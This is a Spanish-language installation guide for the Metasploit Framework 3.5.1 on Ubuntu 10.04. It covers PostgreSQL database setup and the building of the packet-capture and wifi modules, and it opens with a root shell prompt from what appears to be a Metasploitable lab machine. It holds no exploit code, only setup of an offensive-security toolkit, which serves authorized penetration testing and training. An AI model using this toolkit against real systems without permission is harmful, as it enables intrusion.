Linux metasploitable 2.6.24-16-server
whoami
root

# Instalar metasploit

Introducción

Instalación en Ubuntu

Instalación de metasploit
# cat /etc/lsb-release | grep DESC
DISTRIB_DESCRIPTION="Ubuntu 10.04.1 LTS"
# cd
# apt-get install ruby libopenssl-ruby libyaml-ruby \
libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
# apt-get install subversion
# apt-get install build-essential ruby-dev libpcap-dev
# mkdir metasploit
# cd metasploit
# wget http://updates.metasploit.com/data/releases/framework-3.5.1.tar.bz2
# tar xvjf framework-3.5.1.tar.bz2
# mkdir -p /opt/metasploit3
# cp -a msf3/ /opt/metasploit3/msf3
# ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/
# svn update /opt/metasploit3/msf3/
# cd ..
# rm -rf metasploit
Instalación de postgres
# apt-get install postgresql-8.4
# apt-get install rubygems libpq-dev
# gem install pg
# apt-get install libreadline-dev
# apt-get install libssl-dev
# apt-get install libpq5
# apt-get install ruby-dev
Configuración de postgres
# su postgres
$ createuser msf_user -P
Enter password for new role: 
Enter it again: 
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
$ createdb --owner=msf_user msf_database
Configuración de Metasploit
# cat > ~/.msf3/msfconsole.rc << eof
> db_driver postgresql
> db_connect msf_user:password@127.0.0.1:5432/msf_database
> db_workspace -a MiProyecto
> eof
Habilitar el módulo rack sockets
# cd /opt/metasploit3/msf3/external/pcaprub/
# ruby extconf.rb
# make && make install
Habilitar el módulo wifi
# cd  /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install